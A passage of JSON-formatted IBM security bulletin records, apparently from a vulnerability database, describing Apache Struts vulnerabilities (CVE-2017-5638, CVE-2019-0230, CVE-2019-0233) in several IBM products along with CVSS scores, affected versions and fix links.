"D769235D102AD19A73D51C968FFD8889D9656A19C29D4BE9C66233A668FC8B7A", "href": "https://www.ibm.com/support/pages/node/697171", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-02T17:40:19", "description": "## Summary\n\nThere is a vulnerability in Apache Struts to which the IBM\u00ae FlashSystem\u2122 840 and FlashSystem\u2122 900 is susceptible. An exploit of this vulnerability (CVE-2017-5638) could allow a remote attacker to execute arbitrary code on the system\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nFlashSystem 840 machine type and models (MTMs) affected include 9840-AE1 and 9843-AE1. \n \nFlashSystem 900 MTMs affected include 9840-AE2 and 9843-AE2. \n \nCode versions affected include supported VRMFs: \n\u00b7 1.4.0.0 \u2013 1.4.6.0 \n\u00b7 1.3.0.0 \u2013 1.3.0.7\n\n## Remediation/Fixes\n\n_MTMs_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**FlashSystem ****840 MTM: ** \n9840-AE1 & \n9843-AE1 \n \n**FlashSystem 900 MTMs:** \n9840-AE2 & \n9843-AE2| _Code fixes are now available, the minimum VRMF containing the fix depends on the code stream: \n \n___ Fixed code VRMF .__ \n_1.4 stream: 1.4.6.1 _ \n_1.3 stream: 1.3.0.8_| _ __N/A_| [**_FlashSystem 840 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+840&release=All&platform=All&function=all>)** **and [**_FlashSystem 900 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+900&release=All&platform=All&function=all>)** **are available @ IBM\u2019s Fix Central_ _ \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-02-18T01:45:50", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem models 840 and 900", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2023-02-18T01:45:50", "id": "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D", "href": "https://www.ibm.com/support/pages/node/697155", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-13T05:37:08", "description": "## Summary\n\nThere is a vulnerability in Apache Struts to which the IBM\u00ae FlashSystem\u2122 V840 is susceptible. An exploit of this vulnerability (CVE-2017-5638) could allow a remote attacker to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\n**Affected Products and Versions of FlashSystem V840\u2019s two node types \n** \n_Storage Node_ \n\u00b7 Machine Type Models (MTMs) affected include 9846-AE1 and 9848-AE1 \n\u00b7 Code versions affected include supported VRMFs: \no 1.4.0.0 \u2013 1.4.6.0 \no 1.3.0.0 \u2013 1.3.0.7 \n \n_Controller Node _ \n\u00b7 MTMs affected include 9846-AC0, 9848-AC0, 9846-AC1, and 9848-AC1 \n\u00b7 Code versions affected include supported VRMFs: \no 7.8.0.0 \u2013 7.8.0.2 \no 7.7.0.0 \u2013 7.7.1.5\n\n## Remediation/Fixes\n\n_V840 MTMs_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**Storage nodes:** \n9846-AE1 & \n9848-AE1 \n \n**Controller nodes:** \n9846-AC0, \n9846-AC1, \n9848-AC0, & \n9848-AC1| _Code fixes are now available, the minimum VRMF containing the fix depends on the code stream: \n \n___Storage Node VRMF __ \n_1.4 stream: 1.4.6.1 _ \n_1.3 stream: 1.3.0.8_ \n \n__Controller Node VRMF __ \n_7.8 stream: 7.8.1.0_ \n_7.7 stream: 7.7.1.6_| _ __N/A_| [**_FlashSystem V840 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+V840&release=1.0&platform=All&function=all>)** **for storage and controller node** **are available @ IBM\u2019s Fix Central \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T00:32:46", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem model V840", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T00:32:46", "id": "6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "href": "https://www.ibm.com/support/pages/node/697157", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-13T09:36:02", "description": "## Summary\n\nA vulnerability in the Apache Struts component affects the Service Assistant GUI of Storwize V7000 Unified allowing arbitrary code execution. The Command Line Interface is unaffected.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n## Affected Products and Versions\n\nIBM Storwize V7000 Unified \nThe product is affected when running code releases 1.5.x and 1.6.0.0 to 1.6.2.1\n\n## Remediation/Fixes\n\nA fix for these issues is in version 1.6.2.2 of IBM Storwize V7000 Unified. Version 1.5 is end of service. Customers running on this release of IBM Storwize V7000 Unified can upgrade to v1.6.2.2 for a fix. \n \n[_Latest Storwize V7000 Unified Software_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1003918&myns=s028&mynp=OCST5Q4U&mync=E>) \n \nPlease contact IBM support for assistance in upgrading your system.\n\n## Workarounds and Mitigations\n\nAlthough IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have access to the system are authenticated by another security system such as a firewall.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T00:34:31", "type": "ibm", "title": "Security Bulletin:Vulnerability in Apache Struts affects Storwize V7000 Unified (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T00:34:31", "id": "0766EE3C620AAAF614D24B4B93352C6C94F10148776C7854787A45858D29E32F", "href": "https://www.ibm.com/support/pages/node/697609", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-27T21:50:43", "description": "## Summary\n\nFix is available for vulnerabilities in Apache Struts affecting Tivoli Netcool/OMNIbus WebGUI (CVE-2019-0233, CVE-2019-0230).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Netcool/OMNIbus_GUI| 8.1.x \n \n\n\n## Remediation/Fixes\n\nProduct| VRMF| APAR | Remediation/First Fix \n---|---|---|--- \nTivoli Netcool/OMNIbus WebGUI| 8.1.0| IJ27034| Apply Fix Pack 20 \n([Fix Pack for WebGUI 8.1.0 Fix Pack 20](<https://www.ibm.com/support/pages/node/6236916> \"Fix Pack for WebGUI 8.1.0 Fix Pack 20\" )) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-23T04:29:58", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Struts affect Tivoli Netcool/OMNIbus WebGUI (CVE-2019-0233, CVE-2019-0230)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-09-23T04:29:58", "id": "9235ED396A90BB944C2B22072DE6B91B22155C3982DDD732067344CA700C0ADE", "href": "https://www.ibm.com/support/pages/node/6336355", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:12", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-04T09:07:08", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-11-04T09:07:08", "id": "60BC7D4DCC3D358CA3A091D2D1C15EE5A67539C2664E72739BD35D6406A88E4A", "href": "https://www.ibm.com/support/pages/node/6359445", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:24", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T19:21:52", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-10-28T19:21:52", "id": "20DAAA2A40C4A633F7230B8255F0CADBA6E88A77DD305EC21132BECBFF011089", "href": "https://www.ibm.com/support/pages/node/6356621", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:24", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T19:08:30", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-10-28T19:08:30", "id": "461BBFF276D2BD07EE935B18691B56E01933360B1B42DAE8AAFFC1167BCA5486", "href": "https://www.ibm.com/support/pages/node/6356619", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:13", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and 